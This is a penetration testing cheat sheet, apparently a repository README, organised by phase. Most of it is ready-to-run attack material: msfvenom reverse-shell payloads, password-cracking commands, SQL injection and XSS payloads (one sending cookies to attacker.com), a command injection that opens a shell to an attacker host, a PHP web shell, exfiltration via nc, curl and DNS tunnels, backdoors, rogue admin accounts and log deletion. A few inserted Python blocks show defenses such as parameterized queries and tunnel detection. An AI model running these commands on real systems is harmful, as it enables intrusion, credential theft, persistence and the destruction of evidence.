Penetration Testing Tools Guide

Table of Contents

  1. Phase 1: Pre-Engagement & Planning
  2. Phase 2: Footprinting (Reconnaissance)
  3. Phase 3: Fingerprinting (Scanning & Enumeration)
  4. Phase 4: Exploitation
  5. Phase 5: Post-Exploitation
  6. Phase 6: Persistence & Covering Tracks
  7. Phase 7: Reporting
  8. Additional References

1. Phase 1: Pre-Engagement & Planning

Methodologies & Standards

| Methodology | Description |
|---|---|
| PTES | Penetration Testing Execution Standard - detailed technical framework |
| NIST 800-115 | 4 phases: Planning, Discovery, Attack, Reporting |
| OSSTMM | Open Source Security Testing Methodology Manual |
| OWASP | Web Application Security - includes ASVS standard |

Resource: http://www.pentest-standard.org


2. Phase 2: Footprinting (Reconnaissance)

Overview

Passive and active information gathering: network ranges, services, users, employees, software versions.

OSINT Sources

  • Company websites, job postings, social networks
  • Financial databases (EDGAR)
  • Google Hacking / Dorks

Tools

| Tool | Purpose | Usage |
|---|---|---|
| WHOIS | Domain registration info | whois domain.com |
| Maltego | Visualize data relationships | GUI tool |
| theHarvester | Gather emails, subdomains, IPs | theHarvester -d microsoft.com -l 500 -b google |
| FOCA | Extract document metadata | GUI tool |
| Shodan | Search internet-connected devices | Web/CLI |

Google Hacking Database


3. Phase 3: Fingerprinting (Scanning & Enumeration)

Overview

Direct interaction with targets to discover services, OS versions, and vulnerabilities.

3.1 Scanning - Host Identification

| Tool | Usage |
|---|---|
| Nmap | nmap -sn 192.168.0.0/24 |
| Fping | fping -a -g 192.168.0.0/24 |
| ARPScan | arp-scan -l |
| dnsenum | dnsenum domain.com |

3.2 Scanning - Port Scanning

TCP Scan Types (Nmap)

| Scan Type | Option | Description |
|---|---|---|
| TCP SYN | -sS | Stealth scan (most popular) |
| TCP Connect | -sT | Full connection (leaves logs) |
| UDP | -sU | UDP scanning (slower) |
| ACK | -sA | Firewall rule mapping |

Essential Nmap Commands

# Discovery
nmap -sn 192.168.0.0/24          # Ping sweep
nmap -Pn 192.168.0.1             # Skip ping

# Scanning
nmap -sS 192.168.0.1             # SYN scan
nmap -p- 192.168.0.1             # All ports
nmap -sV 192.168.0.1             # Service detection
nmap -O 192.168.0.1              # OS detection
nmap -A 192.168.0.1              # Aggressive scan

3.3 Vulnerability Scanning

| Tool | Type | Usage |
|---|---|---|
| Nessus | Commercial | Web GUI at https://localhost:8834 |
| OpenVAS | Open Source | gvm-start |
| Lynis | Linux auditing | lynis audit system -Q |

3.4 Enumeration

Banner Grabbing

telnet 192.168.0.1 80           # Manual
nc 192.168.0.1 80               # Netcat
nmap -sV 192.168.0.1            # Automated

OS Fingerprinting

| OS | TTL | TCP Window |
|---|---|---|
| Linux | 64 | 5840 |
| Windows 7/10 | 128 | 8192 |
| Cisco IOS | 255 | 4128 |
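As an added example (not part of the repository), a passive classifier that applies the table above to observed packet fields: the observed TTL is rounded up to the nearest common initial value so the hop count is recovered as well, and a weaker TTL-only guess is returned when the window size does not match a row. The signature table is a constructed copy of the three rows above.

```python
from dataclasses import dataclass

# Constructed from the three rows of the table above: (initial TTL, window) -> OS
SIGNATURES = {
    (64, 5840): "Linux",
    (128, 8192): "Windows 7/10",
    (255, 4128): "Cisco IOS",
}
# Weaker fallback: window sizes vary with tuning, initial TTLs rarely do.
TTL_ONLY = {64: "Linux (TTL only)", 128: "Windows (TTL only)", 255: "Cisco IOS (TTL only)"}
INITIAL_TTLS = (64, 128, 255)


@dataclass
class Guess:
    os: str
    initial_ttl: int
    hops: int         # initial_ttl - observed TTL, i.e. routers traversed
    confidence: str   # "ttl+window" or "ttl"


def initial_ttl_for(observed_ttl: int) -> int:
    """Smallest common initial TTL that is >= the observed value."""
    if not 1 <= observed_ttl <= 255:
        raise ValueError(f"TTL out of range: {observed_ttl}")
    return next(base for base in INITIAL_TTLS if observed_ttl <= base)


def guess_os(observed_ttl: int, window: int) -> Guess:
    """Classify one observed (TTL, TCP window) pair from a captured SYN/SYN-ACK."""
    base = initial_ttl_for(observed_ttl)
    hops = base - observed_ttl
    if (base, window) in SIGNATURES:
        return Guess(SIGNATURES[(base, window)], base, hops, "ttl+window")
    return Guess(TTL_ONLY[base], base, hops, "ttl")
```

Useful on the defensive side too: an asset whose guessed OS disagrees with the inventory is worth a look.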

SMB Enumeration (Windows/Samba Shares)

nbtscan -r 192.168.0.0/24
enum4linux -v -a 192.168.0.101

SMTP/SNMP Enumeration

smtp-user-enum -M VRFY -U users.txt -t 192.168.0.1
snmp-check 192.168.0.101

4. Phase 4: Exploitation

4.1 Metasploit Framework

Startup

msfdb init
msfconsole

Payloads

Types:

  • Shell: Basic command shell
  • Meterpreter: Advanced post-exploitation
  • Bind: Listen on target
  • Reverse: Connect back (firewall bypass)
  • Staged: Two-stage delivery (name uses a slash, e.g. meterpreter/reverse_tcp)
  • Single: All-in-one (name uses an underscore, e.g. meterpreter_reverse_tcp)

Common Commands

search <vulnerability>
use exploit/<path>
show options
set RHOST <target>
set LHOST <attacker>
set PAYLOAD <payload>
exploit

# Sessions
sessions -l
sessions -i 1

Meterpreter Essentials

sysinfo / getuid / ps / migrate <PID>
download/upload <file>
getsystem / hashdump
run persistence -X -i 60 -p 4444 -r <IP>

Payload Generation

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe -o payload.exe
msfvenom -p linux/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf -o payload

4.2 Exploit Development

Workflow

  1. Fuzzing → 2. Analysis → 3. Offset Finding → 4. Bad Characters → 5. Return Address → 6. Shellcode → 7. Testing

# Pattern creation/offset
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 1000
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q <EIP>

Client-Side Exploitation

Browser Exploitation

use exploit/windows/browser/ms10_002_aurora
use auxiliary/server/browser_autopwn

BeEF (Browser Exploitation Framework)

beef-xss
# Default: http://127.0.0.1:3000/ui/panel (beef:beef)

Document Exploits

# PDF
use exploit/windows/fileformat/adobe_pdf_embedded_exe

# Office Macro
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f vba

Password Attacks

Online Attacks

Hydra:

hydra -l <user> -P wordlist.txt ssh://<IP>
hydra -L users.txt -P passwords.txt <IP> http-post-form "/login:user=^USER^&pass=^PASS^:F=incorrect"

Offline Attacks

Hash Acquisition:

# Windows (Metasploit)
meterpreter > hashdump

# Linux
cat /etc/shadow

Cracking:

# John the Ripper
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
john --format=nt hashes.txt

# Hashcat
hashcat -m 1000 -a 0 hashes.txt wordlist.txt
hashcat -m 1000 -a 3 hashes.txt ?a?a?a?a?a?a    # Brute force

Wordlist Generation

cewl <URL> -w wordlist.txt                      # Spider website
crunch 8 8 0123456789 -o numbers.txt            # Generate combinations

Web Exploitation

SQL Injection

# Detection
?id=1' OR '1'='1

# UNION-based
' UNION SELECT NULL,username,password FROM users--

# Time-based blind
' AND IF(1=1, SLEEP(5), 0)--

Tool:

sqlmap -u "http://target/page.php?id=1"
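Added example, not from the repository: the detection payload above and a one-column version of the UNION payload run against a constructed in-memory SQLite table, once through string concatenation (the vulnerable page.php?id= pattern) and once through a bound parameter, which is the fix.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample table (not the page's); the password column holds dummy hashes."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id TEXT, username TEXT, password TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?, ?)",
                    [("1", "alice", "h1"), ("2", "bob", "h2"), ("3", "carol", "h3")])
    return con


def lookup_vulnerable(con: sqlite3.Connection, user_id: str) -> list:
    """id built by concatenation: quotes in the input become SQL syntax."""
    sql = "SELECT username FROM users WHERE id = '" + user_id + "'"
    return [row[0] for row in con.execute(sql)]


def lookup_parameterized(con: sqlite3.Connection, user_id: str) -> list:
    """Bound parameter: the driver passes the input as a value, never as statement text."""
    rows = con.execute("SELECT username FROM users WHERE id = ?", (user_id,))
    return [row[0] for row in rows]


def demo() -> dict:
    """Run the page's tautology payload and a one-column UNION payload both ways."""
    con = make_db()
    payloads = {"tautology": "1' OR '1'='1",
                "union": "' UNION SELECT password FROM users--"}
    return {name: (lookup_vulnerable(con, p), lookup_parameterized(con, p))
            for name, p in payloads.items()}
```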

Cross-Site Scripting (XSS)

Payloads:

<script>alert('XSS')</script>
<img src=x onerror=alert(1)>
<script>fetch('http://attacker.com/steal?c='+document.cookie);</script>

Tool:

xsser -u "http://target/page?q=XSS"

Cross-Site Request Forgery (CSRF)

<img src="http://bank.com/transfer?amount=6000&to=attacker" hidden>

Defense: CSRF tokens
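Added example (not from the repository) of the token defense against the forged img request above: a token bound to the session by an HMAC with a server-side key, checked in constant time, plus a handler that refuses GET for the state change. The key, session ids and the /transfer handler are constructed for this example.

```python
import hashlib
import hmac
import secrets
import time

# Constructed server-side key for this example; a real deployment loads it from config.
SERVER_KEY = secrets.token_bytes(32)


def issue_token(session_id: str, now=None) -> str:
    """Token bound to the session and a timestamp: <ts>.<HMAC(session_id:ts)>."""
    ts = str(int(time.time() if now is None else now))
    mac = hmac.new(SERVER_KEY, f"{session_id}:{ts}".encode(), hashlib.sha256).hexdigest()
    return f"{ts}.{mac}"


def verify_token(session_id: str, token: str, max_age: int = 3600, now=None) -> bool:
    """True only if the token was issued for this session and has not expired."""
    try:
        ts, mac = token.split(".", 1)
        age = int(time.time() if now is None else now) - int(ts)
    except ValueError:
        return False
    if not 0 <= age <= max_age:
        return False
    expected = hmac.new(SERVER_KEY, f"{session_id}:{ts}".encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected, mac)   # constant-time comparison


def handle_transfer(method: str, session_id: str, form: dict, now=None) -> int:
    """Constructed /transfer handler; returns an HTTP status code."""
    if method != "POST":           # an <img> tag can only issue a GET
        return 405
    if not verify_token(session_id, form.get("csrf_token", ""), now=now):
        return 403                 # the cookie arrived, but a cross-site page cannot read the token
    return 200
```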

Command Injection

# Vulnerable: system("ping -c 4 " . $_GET['ip']);
?ip=127.0.0.1; cat /etc/passwd
?ip=127.0.0.1 | nc attacker 4444 -e /bin/bash
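Added example (not from the repository): the vulnerable PHP line above rebuilt in Python, a check that reports which shell operators the two payloads smuggle into the command string, and the hardened form that validates the parameter as an IP address and hands ping an argv list so no shell ever parses it.

```python
import ipaddress
import shlex
import subprocess


def build_vulnerable(ip: str) -> str:
    """Mirror of system("ping -c 4 " . $_GET['ip']): one string destined for a shell."""
    return "ping -c 4 " + ip


def shell_operators(command: str) -> list:
    """Tokens a POSIX shell would treat as command separators or pipes in this string."""
    lexer = shlex.shlex(command, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    return [tok for tok in lexer if tok in (";", "|", "||", "&&", "&")]


def validate_ip(value: str) -> str:
    """Accept only a literal IPv4/IPv6 address; anything else raises ValueError."""
    try:
        return str(ipaddress.ip_address(value.strip()))
    except ValueError as exc:
        raise ValueError(f"rejected ping target {value!r}") from exc


def is_allowed_target(value: str) -> bool:
    try:
        validate_ip(value)
        return True
    except ValueError:
        return False


def build_hardened(ip: str) -> list:
    """argv list: ';' and '|' would be plain characters inside the single target argument."""
    return ["ping", "-c", "4", validate_ip(ip)]


def run_ping(ip: str) -> int:
    return subprocess.run(build_hardened(ip), capture_output=True).returncode
```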

File Upload Vulnerabilities

Bypass techniques:

shell.php.jpg
shell.php5, shell.phtml
Content-Type: image/jpeg
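Added example (not from the repository) of an upload check that closes the three bypasses listed above: every extension in the name is tested, not just the last one (shell.php.jpg can be executed as PHP under an Apache AddHandler configuration); alternate PHP extensions are denied outright; and the file's leading bytes must match the claimed image type, while the client-supplied Content-Type is only reported. The extension sets, magic bytes and storage naming are constructed for this example.

```python
import os
import secrets

ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif"}
# Extensions a PHP-enabled server may execute; checked against every extension in the name.
EXECUTABLE_EXTENSIONS = {"php", "php3", "php4", "php5", "php7", "phtml", "phar", "htaccess"}
# Leading bytes a file of each allowed type must start with.
MAGIC = {
    "jpg": b"\xff\xd8\xff", "jpeg": b"\xff\xd8\xff",
    "png": b"\x89PNG\r\n\x1a\n", "gif": b"GIF8",
}


def check_upload(filename: str, content: bytes, content_type: str) -> tuple:
    """Return (accepted, reason). content_type comes from the client and is never trusted."""
    name = os.path.basename(filename).lower()
    exts = name.split(".")[1:]
    if not exts:
        return False, "no extension"
    if any(ext in EXECUTABLE_EXTENSIONS for ext in exts):
        return False, f"executable extension in name: {name}"
    final = exts[-1]
    if final not in ALLOWED_EXTENSIONS:
        return False, f"extension not allowed: .{final}"
    if not content.startswith(MAGIC[final]):
        return False, f"content is not a {final} (client claimed {content_type})"
    return True, "ok"


def storage_name(final_ext: str) -> str:
    """Server-chosen random name; the client's filename never reaches the filesystem."""
    return f"{secrets.token_hex(16)}.{final_ext}"
```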

Web Scanning Tools

nikto -h http://target
wpscan --url http://target --enumerate u
gobuster dir -u http://target -w wordlist.txt

Web Shells

<?php system($_GET['cmd']); ?>
weevely generate password shell.php
weevely http://target/shell.php password

Privilege Escalation

Linux Privilege Escalation

Enumeration:

# Automated
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
./linpeas.sh

# Manual
sudo -l
find / -perm -u=s -type f 2>/dev/null       # SUID
getcap -r / 2>/dev/null                      # Capabilities
cat /etc/crontab                             # Cron jobs

Exploitation:

# SUID binary (GTFOBins: https://gtfobins.github.io/)
find /etc/passwd -exec /bin/bash -p \;

# Sudo misconfiguration
sudo find /etc/passwd -exec /bin/bash \;

Windows Privilege Escalation

Enumeration:

# Automated
.\winPEAS.exe

# Manual
whoami /priv
systeminfo
wmic qfe                                     # Patches
sc query                                     # Services

Exploitation:

# Token impersonation (Meterpreter)
load incognito
list_tokens -u
impersonate_token "NT AUTHORITY\SYSTEM"

# getsystem
meterpreter> getsystem

5. Phase 5: Post-Exploitation

Local Information Gathering

# File search
meterpreter> search -f *password*
meterpreter> search -f id_rsa

# Keylogging
meterpreter> keyscan_start
meterpreter> keyscan_dump

# Credentials
meterpreter> run post/windows/gather/credentials/winscp
meterpreter> run post/windows/gather/enum_chrome

# Screenshots
meterpreter> screenshot
meterpreter> webcam_snap

Lateral Movement

Credential Re-use

PSExec:

# Metasploit
use exploit/windows/smb/psexec
set SMBUser <user>
set SMBPass <password>

# Impacket
psexec.py domain/user:password@target

Pass-the-Hash

# Metasploit
set SMBPass <LM_hash>:<NTLM_hash>

# Impacket
psexec.py -hashes <LM>:<NTLM> domain/user@target

Pivoting

Metasploit Route:

meterpreter> run autoroute -s 192.168.0.0/24
msf> route add 192.168.0.0 255.255.255.0 <session_id>

SOCKS Proxy:

# Meterpreter
use auxiliary/server/socks4a
run

# ProxyChains
echo "socks4 127.0.0.1 1080" >> /etc/proxychains.conf
proxychains nmap -sT 192.168.0.0/24

Data Exfiltration

Methods

# TCP
nc -lvnp 4444 > received.zip                 # Attacker
nc attacker_ip 4444 < data.zip               # Victim

# HTTP
curl -X POST -F "file=@data.zip" http://attacker/upload

# DNS (Iodine)
iodined -f -c -P password 10.0.0.1 tunnel.domain.com    # Attacker
iodine -f -P password tunnel.domain.com                 # Victim
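Added example, not from the repository, of the detection side of the DNS method above: a resolver log is profiled per registered domain, and domains receiving a stream of long, high-entropy first labels (the shape of tunnelled data) are flagged. The log lines are constructed, the registered-domain rule is a simple last-two-labels assumption, and the thresholds are starting points to tune.

```python
import math
from collections import defaultdict

# Constructed resolver log (not real traffic): "<time> <client> <qtype> <qname>".
# The NULL queries imitate a tunnel client carrying data in long random labels.
SAMPLE_LOG = """\
2024-05-01T10:00:01Z 10.0.0.5 A www.example.com
2024-05-01T10:00:02Z 10.0.0.5 A mail.example.com
2024-05-01T10:00:03Z 10.0.0.7 NULL 0a1b2c3d4e5f67890a1b2c3d4e5f6789.t.tunnel.domain.com
2024-05-01T10:00:03Z 10.0.0.7 NULL f0e1d2c3b4a5968778695a4b3c2d1e0f.t.tunnel.domain.com
2024-05-01T10:00:04Z 10.0.0.7 NULL 9f8e7d6c5b4a39281706f5e4d3c2b1a0.t.tunnel.domain.com
2024-05-01T10:00:04Z 10.0.0.7 NULL 3c2d1e0f9a8b7465f1e2d3c4b5a60798.t.tunnel.domain.com
2024-05-01T10:00:05Z 10.0.0.5 A cdn.example.com
"""


def shannon_entropy(label: str) -> float:
    """Bits per character: encoded data scores high, ordinary hostnames score low."""
    n = len(label)
    if not n:
        return 0.0
    counts = (label.count(ch) for ch in set(label))
    return -sum(c / n * math.log2(c / n) for c in counts)


def registered_domain(qname: str) -> str:
    # Assumption: the last two labels are the registered domain (no public-suffix list).
    return ".".join(qname.lower().rstrip(".").split(".")[-2:])


def profile(log: str) -> dict:
    """Per domain: query count, mean first-label length and entropy, NULL/TXT count."""
    stats = defaultdict(lambda: {"queries": 0, "len": 0.0, "entropy": 0.0, "odd_qtype": 0})
    for line in log.splitlines():
        _time, _client, qtype, qname = line.split()
        first = qname.split(".")[0]
        d = stats[registered_domain(qname)]
        d["queries"] += 1
        d["len"] += len(first)
        d["entropy"] += shannon_entropy(first)
        d["odd_qtype"] += qtype in ("NULL", "TXT")   # record types tunnels favour
    for d in stats.values():
        d["len"] /= d["queries"]
        d["entropy"] /= d["queries"]
    return dict(stats)


def flag_tunnels(log: str, min_queries=3, min_len=30, min_entropy=3.0) -> list:
    """Domains receiving a sustained stream of long, high-entropy labels."""
    return sorted(dom for dom, s in profile(log).items()
                  if s["queries"] >= min_queries and s["len"] >= min_len
                  and s["entropy"] >= min_entropy)
```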

6. Phase 6: Persistence & Covering Tracks

Startup Scripts

Windows Registry:

reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v Backdoor /t REG_SZ /d "C:\backdoor.exe"

Linux:

crontab -e
# Add: @reboot /path/to/backdoor.sh

Adding Users

# Windows
net user hacker Pass123! /add
net localgroup Administrators hacker /add

# Linux
sudo useradd -m -s /bin/bash hacker
sudo usermod -aG sudo hacker

Backdoors

# Meterpreter persistence
meterpreter> run persistence -U -i 5 -p 4444 -r attacker_ip

Covering Tracks

Hide Source IP

TOR:

sudo apt install tor
torify curl http://check.torproject.org

ProxyChains:

sudo nano /etc/proxychains.conf
# Add: socks4 127.0.0.1 9050
proxychains nmap -sT target.com

Delete Logs

# Windows
meterpreter> clearev
wevtutil cl Security

# Linux
sudo rm -rf /var/log/*
history -c

Rootkits

Detection tools:

rkhunter --check      # Linux
chkrootkit            # Linux

Hide Files

Windows ADS:

type secret.zip > readme.txt:secret.zip
start C:\readme.txt:secret.zip

Linux:

mv backdoor .hidden_backdoor

7. Phase 7: Reporting

A comprehensive penetration test report should include:

  1. Executive Summary - High-level findings for management
  2. Methodology - Standards and frameworks used
  3. Scope - Systems and networks tested
  4. Findings - Detailed vulnerabilities with severity ratings (CVSS)
  5. Evidence - Screenshots, command outputs, exploitation proof
  6. Risk Assessment - Impact and likelihood analysis
  7. Remediation - Specific mitigation recommendations
  8. Conclusion - Overall security posture assessment

References

Essential Tools & Frameworks

Wordlists

Knowledge Bases


About

A collation of useful tools separated by pentesting phase, along with some theoretical material and pentesting report examples.